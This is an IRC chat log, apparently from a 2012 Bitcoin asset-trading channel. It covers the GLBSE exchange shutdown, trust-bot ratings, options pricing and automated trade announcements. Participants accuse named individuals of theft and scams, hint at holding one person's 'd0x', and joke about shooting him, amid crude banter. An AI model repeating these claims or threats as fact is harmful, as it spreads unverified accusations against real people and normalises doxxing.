Oct 09 19:10:57 i did well with a company i ran, then oil then gold... Oct 09 19:11:01 i got fucked hard with btc Oct 09 19:11:23 Chaang-Noi: it's all cause of that chip you gave me at the casino :( Oct 09 19:11:27 I'm the source of all your woes Oct 09 19:11:29 :( Oct 09 19:11:44 that chip is still being held Oct 09 19:11:50 i hope to buy it back one day Oct 09 19:11:58 I mean the actual casino chip you gave me :) Oct 09 19:12:02 not the coin I claim to have stolen Oct 09 19:12:03 oh lol no Oct 09 19:12:25 i had a budget on the amount that i was going to lose that trip Oct 09 19:12:27 lol Oct 09 19:12:28 i never hit it Oct 09 19:12:38 Chaang-Noi: oh I'm glad Oct 09 19:12:38 yeah i was shocked Oct 09 19:12:51 I hit mine pretty early :P Oct 09 19:12:51 i got lucky a lot Oct 09 19:12:53 your luck was fail Oct 09 19:12:58 you lost 11 in a row right? Oct 09 19:13:02 11 out of 11 Oct 09 19:13:04 I think I won one Oct 09 19:13:07 and then lost the rest Oct 09 19:13:07 oh okay Oct 09 19:13:13 it was prettyi mpressive though Oct 09 19:13:13 yeah man, osrry about tat Oct 09 19:13:14 that Oct 09 19:13:24 I had similar performance when trying with my own money Oct 09 19:13:26 yeah, that was crazy odds Oct 09 19:13:29 which is why I stopped so early :P Oct 09 19:13:38 i did well on craps and 3 cardpoler Oct 09 19:13:43 games id never played before Oct 09 19:13:53 streight flush and then 172 odds on craps Oct 09 19:13:54 I guess this just means I'm really lucky with the women Oct 09 19:13:55 right? Oct 09 19:14:00 :) Oct 09 19:14:03 yeah, that was crazy Oct 09 19:14:08 casinos mean nothing Oct 09 19:14:20 we know the odds are aginsts us Oct 09 19:14:23 yup Oct 09 19:14:28 im just shocked i did not hit my limit on losses Oct 09 19:14:35 3 cardpoler ... i knew a chick we called that Oct 09 19:14:38 :) Oct 09 19:14:49 ;) Oct 09 19:15:42 :) Oct 09 19:16:01 i was told the strip clubs in vegas are pretty good.. i was told this after i got back, lol Oct 09 19:16:05 sry, cudnt help myself ... as u were Oct 09 19:16:24 meh, we were not talkingabout anyhint real :) Oct 09 19:16:52 lol Oct 09 19:17:24 i think "stolen" triggered my keywords Oct 09 19:17:26 so tiggr your thoughts on glbse? Oct 09 19:17:35 mebe need take that one out of my list Oct 09 19:17:36 oh lol Oct 09 19:17:38 hrrm Oct 09 19:17:41 glbse Oct 09 19:17:48 the sound a pirateship makes sinking Oct 09 19:17:51 id like to see a list of your key words :) Oct 09 19:18:12 hmmm a pirate ship sinking Oct 09 19:18:12 nop :P thats a secret :P Oct 09 19:18:44 personal thoughts == not a deliberate scam ... but stank from day 1 Oct 09 19:18:46 arrr me boooty is wet Oct 09 19:18:55 i dont think glbse was a scam Oct 09 19:19:00 nop Oct 09 19:19:10 but badly handled Oct 09 19:19:19 nefarious-- Oct 09 19:19:28 i think nefario was drunk with power and when he was told he cant act like a tyrant took his ball and went home Oct 09 19:19:40 and he calls himself a doctor too Oct 09 19:19:44 like a supervillion Oct 09 19:19:50 lol what a baby Oct 09 19:19:56 "Of course im drunk with power .. ever tried going crazy without it? noone listens" Oct 09 19:20:16 *simpsons reference 100 bonus points* Oct 09 19:20:43 lol and, iirc DR Nefario IS actually a DR Oct 09 19:20:55 not a medical MD but has a doctorite Oct 09 19:21:13 he needs an MBA Oct 09 19:21:25 lol and several other acronyms Oct 09 19:21:39 badly managed and i shudda seen it coming is my opinion Oct 09 19:21:47 jus too much else to eat popcoin to Oct 09 19:21:54 well Oct 09 19:22:00 i worked with him for a year Oct 09 19:22:12 i knew he lied and made deals he could not keep Oct 09 19:22:20 yah - he donated the bitcoin-police website/domain Oct 09 19:22:21 however i never expected this meltdown Oct 09 19:22:27 i dont think he MEANT to rip anyone Oct 09 19:22:44 im not so sure he even understands he hurt anyone at this point Oct 09 19:22:51 yah i agree Oct 09 19:23:02 his d0x is had .. if need be hes done Oct 09 19:23:04 I expected it from the time I started using it, however how the hell could I possibly pinpoint the exact when. Oct 09 19:23:12 but id like to think he will do the right thing Oct 09 19:23:16 just take it easy on me Oct 09 19:23:19 i'm a good guy Oct 09 19:23:21 (wishful thinking perhaps) Oct 09 19:23:47 lol jcpham checks out :D give HIM yer bitcoins Oct 09 19:23:48 I treated all of these things as a gamble and I dont like losing so i'm still angry about it. Oct 09 19:24:07 MrTiggr most scams work out as good intentions turned sour. Oct 09 19:24:11 you've seen pulp fiction ? Oct 09 19:24:28 unfortunately u are right, mircea_popescu Oct 09 19:24:36 wonder how he will deal with my delisted assets Oct 09 19:24:47 was pulp fiction a scam? Oct 09 19:24:58 also shocked at theymos tossing nefario under the bus at first sign of trouble Oct 09 19:25:13 i'm no longer willing to accept the funds of others Oct 09 19:25:17 or not at this time Oct 09 19:25:58 Lyspooner hehe no, there's a scene wherein frank whaley says "we got into this thing with the best intentions" Oct 09 19:31:10 lol ... an over-used phrase in the bitcoin world for sure Oct 09 19:31:51 jackson's reply is something like "my name's pitt and you'ass ain't talkin' your way outta this shit" Oct 09 19:32:14 lollllllll Oct 09 19:32:24 [MPEX] [S.MPOE] 9476 @ 0.0003115 = 2.9518 BTC [-] Oct 09 19:35:09 [MPEX] [S.MPOE] 6724 @ 0.00031145 = 2.0942 BTC [-] Oct 09 19:35:10 [MPEX] [S.MPOE] 7270 @ 0.00031231 = 2.2705 BTC [+] Oct 09 19:35:11 [MPEX] [S.MPOE] 75158 @ 0.00031236 = 23.4764 BTC [+] Oct 09 19:35:12 [MPEX] [S.MPOE] 6753 @ 0.00031595 = 2.1336 BTC [+] Oct 09 19:35:13 [MPEX] [S.MPOE] 16700 @ 0.00031703 = 5.2944 BTC [+] Oct 09 19:35:15 [MPEX] [S.MPOE] 55441 @ 0.0003182 = 17.6413 BTC [+] Oct 09 19:35:16 [MPEX] [S.MPOE] 41500 @ 0.00031941 = 13.2555 BTC [+] Oct 09 19:35:17 [MPEX] [S.MPOE] 4278 @ 0.00031961 = 1.3673 BTC [+] Oct 09 19:35:18 [MPEX] [S.MPOE] 62840 @ 0.00031965 = 20.0868 BTC [+] Oct 09 19:35:19 [MPEX] [S.MPOE] 6100 @ 0.00031987 = 1.9512 BTC [+] Oct 09 19:35:19 [MPEX] [S.MPOE] 12900 @ 0.00032035 = 4.1325 BTC [+] Oct 09 19:35:20 [MPEX] [S.MPOE] 26769 @ 0.000321 = 8.5928 BTC [+] Oct 09 19:35:21 [MPEX] [S.MPOE] 5000 @ 0.00032128 = 1.6064 BTC [+] Oct 09 19:35:22 [MPEX] [S.MPOE] 50270 @ 0.00032133 = 16.1533 BTC [+] Oct 09 19:35:23 [MPEX] [S.MPOE] 41100 @ 0.00032135 = 13.2075 BTC [+] Oct 09 19:35:24 [MPEX] [S.MPOE] 5349 @ 0.00032349 = 1.7303 BTC [+] Oct 09 19:35:24 o hey Oct 09 19:35:25 [MPEX] [S.MPOE] 25300 @ 0.00032383 = 8.1929 BTC [+] Oct 09 19:35:26 [MPEX] [S.MPOE] 34500 @ 0.00032667 = 11.2701 BTC [+] Oct 09 19:35:27 [MPEX] [S.MPOE] 3548 @ 0.00032706 = 1.1604 BTC [+] Oct 09 20:01:14 [MPEX] [S.MPOE] 61600 @ 0.0003115 = 19.1884 BTC [-] Oct 09 20:26:36 [MPEX] [S.MPOE] 25600 @ 0.00031144 = 7.9729 BTC [-] Oct 09 20:37:57 ;;rate nefario -1 At the very least, has been managing horribly the closing up of glbse... Oct 09 20:37:58 Rating entry successful. Your rating of -1 for user nefario has been recorded. Oct 09 20:40:08 ;;gettrust nefario Oct 09 20:40:08 Trust relationship from user mircea_popescu to user nefario: Level 1: -1, Level 2: -2 via 5 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=nefario Oct 09 20:47:18 gahh borring Oct 09 20:51:55 [MPEX] [S.MPOE] 100 @ 0.0003115 = 0.0312 BTC [+] Oct 09 21:06:34 kakobrekla, how many people are there? Oct 09 21:06:53 we too had some meetings here in bratislava, about 20 ppl came Oct 09 21:07:30 jurov pics ? blogposts ? Oct 09 21:15:06 i'm not there anyway, i did talk about coinbr but that was not recorded Oct 09 21:15:12 hm Oct 09 21:15:17 id say Oct 09 21:15:22 just under 100 Oct 09 21:15:32 and jesus fuck a lot of nonsense Oct 09 21:15:44 i should be talking here Oct 09 21:17:03 [MPEX] [S.MPOE] 33202 @ 0.00031329 = 10.4019 BTC [+] Oct 09 21:17:21 100 ?! Oct 09 21:17:25 wow. Oct 09 21:17:36 bitstamp is talking laterz Oct 09 21:17:42 he owes me a coke. Oct 09 21:20:27 haha Oct 09 21:20:35 you folks got a feed anywhere ? Oct 09 21:21:05 http://www.kiberpipa.org:8099/live.html Oct 09 21:21:21 im sitting 1m right of the the pinguin lol Oct 09 21:21:41 not this set is ending Oct 09 21:21:47 im guessing there will be a pause Oct 09 21:22:27 the stuffed penguin or the gesturing penguin ? Oct 09 21:22:28 end Oct 09 21:22:37 aha Oct 09 21:22:45 bitstamp is now Oct 09 21:22:45 no pause Oct 09 21:27:15 ok mircea_popescu your favourite guys Oct 09 21:27:18 now :) Oct 09 21:27:34 where did usagi go? I miss that crazy mancunt .. No, actually I do not miss him at all Oct 09 21:27:54 Arf, just noticed the new MPOE-PR avatar Oct 09 21:28:04 hm ? Oct 09 21:28:26 my ignore list sucks, i used to get 500-600 lines a day Oct 09 21:28:31 yest was 0, today it's 0 wtf. Oct 09 21:28:33 cm'n guys, I have this absolutely worthless test security in OT. pays 10% per week (in your dreams) Oct 09 21:29:03 oh, I think I have him on ignore :( Oct 09 21:41:51 i removed myself from the room Oct 09 21:42:00 too much bull. Oct 09 21:42:52 [MPEX] [S.MPOE] 700 @ 0.00031398 = 0.2198 BTC [+] Oct 09 21:43:40 lol Oct 09 21:44:31 i could troll the shit out of bitstamp Oct 09 21:44:57 awww Oct 09 21:45:40 main audience are noobs? Oct 09 21:45:54 tech savy bitcoin noobs Oct 09 21:46:03 some miners there also Oct 09 21:46:15 please come to camera and wave to us :DDDD Oct 09 21:46:26 hehe Oct 09 21:46:30 im outside now Oct 09 21:46:33 couldnt handle it Oct 09 21:55:21 https://bitcointalk.org/index.php?topic=117235.msg1259895#msg1259895 this is a pretty good post for the newer kids on the block that might not know the old dirt. brought to you by B0g4r7 Oct 09 21:56:16 Thank you, thank you very much. Oct 09 21:56:26 Oct 09 22:05:13 "The stock market platform (from here on called "the market") steals a number of ideas from OpenTransactions. We will be developing both projects side by side, and where possible share code to reduce the workload, cost and development time." Oct 09 22:05:18 quoth nefario. who knew :p Oct 09 22:10:30 is it "later today" yet? Oct 09 22:10:33 [MPEX] [S.MPOE] 30700 @ 0.00031734 = 9.7423 BTC [+] Oct 09 22:11:35 It is Today's "later today" Oct 09 22:11:52 We'll see a lot of those passing by Oct 09 22:13:10 tomorrow is another today! Oct 09 22:21:01 it was "later today" yesterday Oct 09 22:25:21 great that "today" happens every day Oct 09 22:26:47 i predict the end of the world will occur later today Oct 09 22:26:50 or tomorrow. Oct 09 22:27:24 There's no tomorrow Oct 09 22:27:50 well if there's the end of the world then there isn't. Oct 09 22:27:52 tomorrow and tomorrow and tomorrow Oct 09 22:28:09 right now i have to be honest ,i wait more for Oct 12th than for a GLBSE return ... Oct 09 22:28:10 the marrow of today's tomorrow. Oct 09 22:28:19 Eisenhower34 that's harsh man. Oct 09 22:28:48 so you can not get your coins back from pirate first, and then not get your coins back from nefario? Oct 09 22:29:22 lol Oct 09 22:29:30 harsh? why? Alot lost much more to pirate than to GLBSE Oct 09 22:29:41 Eisenhower34 i was just being an ass. Oct 09 22:29:49 ^^ ah ok :) Oct 09 22:34:17 [MPEX] [S.MPOE] 22244 @ 0.00031416 = 6.9882 BTC [-] Oct 09 22:34:19 [MPEX] [S.MPOE] 11955 @ 0.00031398 = 3.7536 BTC [-] Oct 09 22:34:20 [MPEX] [S.MPOE] 501 @ 0.00031329 = 0.157 BTC [-] Oct 09 22:40:07 [MPEX] [O.BTCUSD.P160T] 1 @ 0.47034915 BTC [+] Oct 09 22:49:10 aw dammit, i typed /quit and hit enter Oct 09 22:50:06 wb lol Oct 09 22:53:27 im dissapint and mad Oct 09 22:53:31 dissapoint Oct 09 22:53:34 ? Oct 09 22:54:09 dissapoint because of the noobishness on the conference and mad because i accualy went there as i could have been easily dissapointed via live stream Oct 09 22:57:31 lol Oct 09 22:57:54 will take a lot of frustration and dissapointment from people just like you before conferences become actually worth going to. Oct 09 22:57:55 but like, you like could like have like built like like like like like like like like like like like the like future of like bitcoin! Oct 09 22:58:00 kakobrekla: you don't need to follow anything. Dissapointness just finds you and falls onto your head wherever you're in bitcoinland. Oct 09 22:58:03 so don't feel entirely bad, you've saved me some time. Oct 09 22:58:56 you could have saved us all some time ans shot nefario in the face Oct 09 23:00:13 at least some new people got introducet to btc Oct 09 23:00:19 introduced Oct 09 23:00:25 more misery Oct 09 23:02:35 i didnt get my coke. Oct 09 23:02:47 bitstamp is scam. Oct 09 23:04:15 so, the situation with glbse is still pretty much a waiting game, eh? Oct 09 23:05:08 [MPEX] [S.MPOE] 30997 @ 0.00031329 = 9.7111 BTC [-] Oct 09 23:05:10 [MPEX] [S.MPOE] 2600 @ 0.00031144 = 0.8097 BTC [-] Oct 09 23:06:30 smickles: yes, exacly as every other bitcoin "business" which have to return funds Oct 09 23:06:59 Oh, yes, wait a little longer, funds are coming Oct 09 23:07:01 lol Oct 09 23:07:02 dub i thought i kinda did. Oct 09 23:07:20 I'm not all that concerned with the funds (in my personal situation), rdponticelli but the shareholder info, that's what I want Oct 09 23:07:42 why hello there smickles Oct 09 23:07:53 smickles: I'm exactly in the same situation Oct 09 23:07:55 Good Day jcpham :) Oct 09 23:08:19 I just had pocket change on the site Oct 09 23:08:32 i'm only interested in the assets Oct 09 23:08:36 and only one at that Oct 09 23:08:37 But I need the list of holding of users Oct 09 23:08:50 And my own holdings Oct 09 23:11:04 Well, I have the list of my transactions, I've downloaded the csv minutes before the closing up Oct 09 23:13:38 http://lmgtfy.com/?q=scammer+tag&l=1 Oct 09 23:13:42 maybe you've seen this Oct 09 23:14:35 https://bitcointalk.org/index.php?topic=13.msg46#msg46 "q : how many coins are created by a cpu miner a day right now ? a (satoshi) : a few hundred) Oct 09 23:14:37 haha Oct 09 23:15:32 jcpham ahahaha Oct 09 23:15:55 please update your thread with that link Oct 09 23:16:04 google loop! Oct 09 23:17:09 im blogging this Oct 09 23:17:15 (with tht link) Oct 09 23:18:01 jcpham: nofucken way Oct 09 23:18:13 true story Oct 09 23:18:16 its true. Oct 09 23:18:23 google knows things. Oct 09 23:24:36 bitstamp is scam... why? i was thinking of using it someday Oct 09 23:26:13 jurov he was just being funny. guys promised him a coke. Oct 09 23:26:47 ah sooooo Oct 09 23:27:44 good this isn't btctalk.. kakobreklad would end up in sorry place like rapeghost Oct 09 23:28:35 lol Oct 09 23:28:44 yeah jurov Oct 09 23:28:49 they wont steal your money Oct 09 23:28:51 but thats it. Oct 09 23:28:59 dont expect anything more :) Oct 09 23:29:22 someone, be a doll, buy some puts http://polimedia.us/bitcoin/mpex.php?mpsic=O.BTCUSD.P140T Oct 09 23:30:36 [MPEX] [S.MPOE] 3110 @ 0.00031143 = 0.9685 BTC [-] Oct 09 23:32:52 https://bitcointalk.org/index.php?topic=117445.0 Oct 09 23:32:53 heh Oct 09 23:32:59 bad times for btc Oct 09 23:33:04 only kako is up! Oct 09 23:33:09 ;> Oct 09 23:34:05 hehe i'm up too... expect update in few days Oct 09 23:34:24 kakobrekla ya it was announced a bit earlier Oct 09 23:34:27 they claim lack of volume Oct 09 23:34:37 then they offer 600 btc bidwall at 12.1, ie, 30 cents over price. Oct 09 23:35:00 heh Oct 09 23:41:19 Seems Theymos might be doing a decent job of teaching people to trust no-one Oct 09 23:41:42 not as good a job as pirate maybe though Oct 09 23:42:41 probably of general interest : http://trilema.com/2012/scammer-tag-nefario-theymos-others-known-and-unknown/ Oct 09 23:46:56 where is the new MPOE-PR avatar from? Oct 09 23:47:26 it's actually her old avatar Oct 09 23:47:32 what do you mean where's it from ? Oct 09 23:47:43 looks familiar Oct 09 23:47:47 i like how smilies are used as utter sarcasm Oct 09 23:48:03 dub you prolly recall it from earlier this year, she was using it on forum Oct 09 23:49:56 moody said its ok to advertise smpake but not bit4x. Oct 09 23:49:57 scammer. Oct 09 23:50:25 lol Oct 09 23:51:42 fine, ill advertise smpake and put bit4x banner on top of the page. Oct 09 23:51:46 lol Oct 09 23:54:17 forex = scammer! run a legititmate ponzi like everyone else Oct 09 23:55:04 ^^ Oct 09 23:55:46 [MPEX] [S.MPOE] 50868 @ 0.00031137 = 15.8388 BTC [-] Oct 09 23:58:31 i aint no milk. Oct 09 23:58:54 ahahaha Oct 09 23:59:00 took me a moment that 1 Oct 09 23:59:25 usagi will now forever live in this community, not through his dubious gender identity or horrible business practice, Oct 09 23:59:37 but through this brilliant addition to the folk culture. MILK IS A SCAMMER! Oct 10 00:00:49 we have had ads saying: Everything Is Scam, Only Milk Is Water Oct 10 00:01:10 hahaha Oct 10 00:03:48 win http://www.youtube.com/watch?feature=endscreen&v=MENjFkEAj9g&NR=1 Oct 10 00:08:06 awesome kakobrekla Oct 10 00:10:54 https://bitcointalk.org/index.php?topic=115669.msg1260084#msg1260084 i wonder who he means ? Oct 10 00:15:03 mircea_popescu - Who do you think he means? Oct 10 00:15:28 TooTnBooT possibly gavin. Oct 10 00:16:08 then again, aspies are aspies. Oct 10 00:16:14 Interesting. Oct 10 00:16:42 So possibly when he decided to legitimately acknowledge being a Bitcoin developer, he wanted to separate the fact that he holds millions in BTC? Oct 10 00:17:17 it's dubious he holds millions. Oct 10 00:17:52 at the time mining became really a public endeavour block count was ~20k. that'd be one million. Oct 10 00:18:16 i guess if he never sold anything and mined a majority of those first 20k blocks he could have 1mn. Oct 10 00:20:09 hmm Oct 10 00:20:58 oh hey, pirate is paying back this weekend Oct 10 00:21:21 dub - funny Oct 10 00:21:26 [MPEX] [S.MPOE] 8200 @ 0.00031143 = 2.5537 BTC [+] Oct 10 00:21:28 in a system.. if last trade was a buy at say.. 1.5... and there is a sell at 1.75 that goes through, even though the price is higher than the last trade, woudl you mark that as an up or down for last trade? Oct 10 00:21:37 TooTnBooT and who might you be ? Oct 10 00:21:39 cause in theory it was a downward aimed sell Oct 10 00:21:54 Ukto + Oct 10 00:22:02 its up from last trade, so + Oct 10 00:22:41 assbot would say + Oct 10 00:22:53 so it takes 2 sell's work to declare a down? Oct 10 00:22:56 mircea_popescu - I was in here asking about investing a week or so ago. You criticized my knowledge. Oct 10 00:23:11 Ukto it can be 2 buys Oct 10 00:23:19 or a sale and a buy Oct 10 00:23:22 or a buy and a sale Oct 10 00:23:28 TooTnBooT how's that worked out for you ? Oct 10 00:23:42 i jsut figured that a sale, would be aimed down Oct 10 00:23:43 lol Oct 10 00:23:45 Ukto it takes the price oflast sale going under the price of prev last sale Oct 10 00:23:51 yeh Oct 10 00:23:56 Ukto it doesnt matter what is it Oct 10 00:24:00 each sale is a buy Oct 10 00:24:03 and each buy is a sale Oct 10 00:24:04 I sold all my S.Dice passthru shares and withdrew from GLBSE, so it worked out well actually. Oct 10 00:24:06 in effect Oct 10 00:24:12 only numbes matter Oct 10 00:24:14 wd on that score lol Oct 10 00:24:33 kakobrekla he's thinking in booktaking terms, but you're right its irrelevant. Oct 10 00:25:00 yeah, i am just talking display purposes Oct 10 00:25:05 TooTnBooT so were you saying you were going to prove that any asset in glbse is better than mpex stuff or what ? Oct 10 00:25:19 I don't know anything about mpex. Oct 10 00:25:20 Ukto depends what you are displaying then Oct 10 00:25:42 You may be confusing me with someone else. I was complaining about S.Dice. Oct 10 00:25:54 I've never seen mpex. Oct 10 00:26:08 ... Oct 10 00:26:56 its THE bitcoin securities exchange dont you know Oct 10 00:27:09 dub - I guess I don't know. Oct 10 00:27:15 oh wait, theres that cryptostocks one Oct 10 00:27:19 THE exchange I used is no more. Oct 10 00:30:38 its in the friggin topic. Oct 10 00:31:33 meh, people. Oct 10 00:37:01 kakobrekla: Nobody looks at the friggin topic... Oct 10 00:37:07 i know Oct 10 00:37:19 people. Oct 10 00:37:25 I don't even have it enabled Oct 10 00:38:13 i come from a time and place where one got +b for not reading it Oct 10 00:38:55 Well, if you fix quassel, I promise I'll enable it again, and even read it Oct 10 00:39:16 https://bitcointalk.org/index.php?topic=115669.msg1260129#msg1260129 i see this is going admirably well... Oct 10 00:40:15 i havent been following it closley enough Oct 10 00:40:22 why arent we getting payed yet again? Oct 10 00:41:05 because bitcoin. Oct 10 00:41:14 aha Oct 10 00:41:15 makes sense. Oct 10 00:41:17 dafuq Oct 10 00:41:18 ill just wait! Oct 10 00:41:20 :) Oct 10 00:42:49 Irreversible payments, remember? Oct 10 00:42:50 Ask bulanula Oct 10 00:43:48 magnets Oct 10 00:44:59 today i asked deadterra about GSDPT but he got no information from glbse at all... and that one can be solved without moving any bitcoins Oct 10 00:45:30 dunno why they're waiting Oct 10 00:45:51 But you would be asking nefario to stop counting coins to do something else entirely related... Oct 10 00:46:00 *unrelated Oct 10 00:46:08 That's not an option Oct 10 00:46:54 someone was asking me about gsdpt earlier too. sad fact of the matter is, w/o actual shareholder lists there's jackshit anyone can do. Oct 10 00:47:07 [MPEX] [S.MPOE] 2757 @ 0.00031137 = 0.8584 BTC [-] Oct 10 00:47:12 and that faces serious problems because glbse never used gpg keys. and so... Oct 10 00:47:14 fuckall knows. Oct 10 00:47:29 The tickets to pirate's island must be expensive... Oct 10 00:47:54 at least we can estimate the expenses of taaki, strateman and the rest of the scammergroup Oct 10 00:48:04 they need about 100k usd a year to keep going. Oct 10 00:48:16 whether it comes from bitcoinica user funds, glbse user funds or w/e else, it's the rake,. Oct 10 00:48:35 So, how many bitcoinicas a year? Oct 10 00:48:51 they got like 30k or so bitcoin there, right ? btc was about 5 ? Oct 10 00:48:58 now they got like 8k or so here, btc is about 12.5 Oct 10 00:49:07 works out. Oct 10 00:49:21 Yeah, cool business Oct 10 00:50:27 what exactly anyone would have to be thinking to deal with any of them in the future is beyond my mere human comprehension. Oct 10 00:50:39 BTW: Patrick, Amir and Donald aren't tagged, right? Oct 10 00:50:58 well atm neither is theymos, so. Oct 10 00:50:58 They'll have to try harder... Oct 10 00:51:07 far as i'm concerned they're tagged. Oct 10 00:51:10 ;;rated genjix Oct 10 00:51:10 You rated user genjix on Fri Sep 28 02:51:20 2012, giving him a rating of -1, and supplied these additional notes: there's that entire bitcoinica mess to be cleared.. Oct 10 00:51:48 ;;rated genjix Oct 10 00:51:48 You rated user genjix on Sat Jul 14 10:35:57 2012, giving him a rating of -10, and supplied these additional notes: Sorry, guys, but until the bitcoinica incident gets completely sorted out, IMHO you can't be trusted with a single satoshi more.. Oct 10 00:52:11 I've been meaner than you... Oct 10 00:52:26 and apparently much earlier Oct 10 00:52:27 That's not easy Oct 10 00:52:39 i only slapped him when he came in a week ago to "vouch" for scamfarion. Oct 10 00:53:07 It was after they emptied the mtgox account Oct 10 00:53:16 ;;rated genjix Oct 10 00:53:17 You have not yet rated user genjix Oct 10 00:53:41 They had delayed so much the process... Oct 10 00:53:52 And suddenly, that Oct 10 00:54:10 If it was not malice, it was deep incompetence Oct 10 00:54:20 It's a -10 anyway Oct 10 00:54:24 im satisfied that they stole it. Oct 10 00:55:23 ;;gettrust genjix Oct 10 00:55:24 Trust relationship from user chmod755 to user genjix: Level 1: 0, Level 2: 2 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=chmod755&dest=genjix Oct 10 00:55:33 hm Oct 10 00:55:38 ;;rated phantomciruit Oct 10 00:55:38 You have not yet rated user phantomciruit Oct 10 00:55:54 ;;rated phantomcircuit Oct 10 00:55:55 You rated user phantomcircuit on Sat Jul 14 10:35:46 2012, giving him a rating of -10, and supplied these additional notes: Sorry, guys, but until the bitcoinica incident gets completely sorted out, IMHO you can't be trusted with a single satoshi more.. Oct 10 00:56:20 ;;gettrust phantomcircuit Oct 10 00:56:20 Trust relationship from user chmod755 to user phantomcircuit: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=chmod755&dest=phantomcircuit Oct 10 00:56:24 O.o Oct 10 00:56:34 rumor has it that chmod755 is satoshi Oct 10 00:56:39 the one and only Oct 10 00:56:51 jcpham, what? Oct 10 00:57:00 I can tell by the writing style and having seen quite a few satohsis in my time Oct 10 00:57:02 I thought you were satoshi nakamoto Oct 10 00:57:11 ;;whois chmod755 Oct 10 00:57:12 chmod755~ (~chmod755@unaffiliated/chmod755) has been on server zelazny.freenode.net since 10:50 AM, October 09, 2012 (idle for 1 second) and is on #bitcoin-otc, #bitcoin-dev, #bitcoin, and #bitcoin-assets. Oct 10 00:57:21 ;;seen satoshi Oct 10 00:57:21 I have not seen satoshi. Oct 10 00:57:34 jcpham, i'm not Oct 10 00:57:35 that's fine Oct 10 00:57:39 dub also photoshop am irite ? Oct 10 00:57:44 i'll talk with the rumor people then Oct 10 00:57:55 jcpham, which rumor people? Oct 10 00:58:03 the ones who rumor? Oct 10 00:58:09 WHERE? Oct 10 00:58:17 over there. Oct 10 00:58:20 you know Oct 10 00:58:56 I don't remember now who told me Oct 10 00:59:22 jcpham, MrTiggr? :d Oct 10 00:59:29 maybe Oct 10 00:59:57 i couldn't out my sources Oct 10 00:59:57 thats a point actually Oct 10 01:00:15 re: nefario, has anyone called the Bitcoin Police? Oct 10 01:02:14 dub, no Oct 10 01:06:11 ;;tz melbourne Oct 10 01:06:12 Tue Oct 09 22:06:14 2012 UTC | 9:06am Wednesday (EST) - Time in Melbourne VIC, Australia Oct 10 01:06:29 dub, feel free to call the bitcoin police :p Oct 10 01:09:14 me dials ;;911 Oct 10 01:12:34 [MPEX] [S.MPOE] 1275 @ 0.00031137 = 0.397 BTC [-] Oct 10 01:12:36 [MPEX] [S.MPOE] 52651 @ 0.00031136 = 16.3934 BTC [-] Oct 10 01:20:49 theres quite enough chronic masturbation in my life already Oct 10 01:25:25 I called the Sesame Street police, I have a feeling Big Bird and the crew will have just about the same effectiveness in the matter. Oct 10 01:33:38 jeez, i mention bitcoin police and suddenly im getting a rectal exam Oct 10 01:37:46 [MPEX] [S.MPOE] 600 @ 0.00031136 = 0.1868 BTC [-] Oct 10 01:38:41 By Big bird No less. Oct 10 01:39:15 They dont call him Big Bird for nothing nudge nudge Oct 10 01:39:51 thats why Romney loves him Oct 10 02:00:55 [MPEX] [O.BTCUSD.P110T] 10 @ 0.10637201 = 1.0637 BTC [+] Oct 10 02:02:53 [06:20:52] theres quite enough chronic masturbation in my life already Oct 10 02:03:05 dub is a member of the GOP? Oct 10 02:25:56 [MPEX] [S.BVPS] 48 @ 0.00316777 = 0.1521 BTC [+] Oct 10 02:51:51 [MPEX] [S.MPOE] 16057 @ 0.00031143 = 5.0006 BTC [+] Oct 10 03:16:57 [MPEX] [S.MPOE] 50811 @ 0.00031247 = 15.8769 BTC [+] Oct 10 03:16:59 [MPEX] [S.MPOE] 20489 @ 0.00031136 = 6.3795 BTC [-] Oct 10 03:42:05 [MPEX] [S.MPOE] 5560 @ 0.00031136 = 1.7312 BTC [-] Oct 10 03:42:06 [MPEX] [S.MPOE] 35998 @ 0.00031129 = 11.2058 BTC [-] Oct 10 03:50:31 [MPEX] [S.DICE] 2000 @ 0.00339998 = 6.8 BTC [+] Oct 10 03:51:14 aw, c'mon <@assbot> [MPEX] [O.BTCUSD.P110T] 10 @ 0.10637201 = 1.0637 BTC [+], the p140t is a better deal, i'm sure Oct 10 03:52:18 lol why ? Oct 10 03:52:25 it dipped under 11 b4 Oct 10 03:55:11 ;;calc 11-(.10637201*[ticker --last]) Oct 10 03:55:11 9.72908849892 Oct 10 03:55:36 nah that's not correct. Oct 10 03:55:38 ;;calc 14-(.25780139*[ticker --last]) Oct 10 03:55:38 10.9198405526 Oct 10 03:55:51 .py (11 - 9.72908849892) / 9.72908849892 - 9.72908849892 Oct 10 03:55:53 -9.59845843001 Oct 10 03:56:51 .py (11 - 9.72908849892) / 9.72908849892 - 0.10637201 Oct 10 03:56:52 0.0242580589136 Oct 10 03:57:00 the calc i did isn't the break even point? Oct 10 03:57:03 nope. Oct 10 03:57:18 at the price you propose there's a 0.02xx btc profit Oct 10 03:57:34 per contract. ie 20% Oct 10 03:57:53 strike - premium isn't breakeven for puts? Oct 10 03:58:12 strike - thenprice / thenprice Oct 10 03:58:27 is then-value of puts Oct 10 03:58:32 then you substract premium from that Oct 10 03:59:22 put110t is worth 10btc per contract if btc/usd = 1 Oct 10 04:00:45 ;;seen usagi Oct 10 04:00:45 usagi was last seen in #bitcoin-assets 4 days, 17 hours, 47 minutes, and 10 seconds ago: We own 2000 shares.. should be good if glbse comes up :/ Oct 10 04:01:44 no wonder is so quiet. Oct 10 04:01:54 lol Oct 10 04:02:11 he owns "malicious criminal libel" in google you knwo. Oct 10 04:02:17 not quiet enough Oct 10 04:02:27 hm mp? Oct 10 04:03:34 .g "malicious criminal libel" Oct 10 04:03:34 mircea_popescu: https://bitcointalk.org/index.php?topic=112927.0 Oct 10 04:04:17 a. Oct 10 04:06:24 ;;calc (14-[ticker --last])/[ticker --last] - .2578139 Oct 10 04:06:25 -0.0862657828452 Oct 10 04:06:55 ;;calc (11-[ticker --last])/[ticker --last] - .10637201 Oct 10 04:06:56 -0.18586991795 Oct 10 04:07:26 is that not a better deal on the 14? Oct 10 04:09:06 smickles depends where it ends up going Oct 10 04:09:55 always the time value of an option will be a larger part of its total value the closer the strike is to current price Oct 10 04:16:18 [MPEX] [S.MPOE] 3700 @ 0.000312 = 1.1544 BTC [+] Oct 10 04:16:20 [MPEX] [S.MPOE] 40202 @ 0.00031129 = 12.5145 BTC [-] Oct 10 04:16:20 [MPEX] [S.MPOE] 24498 @ 0.00031122 = 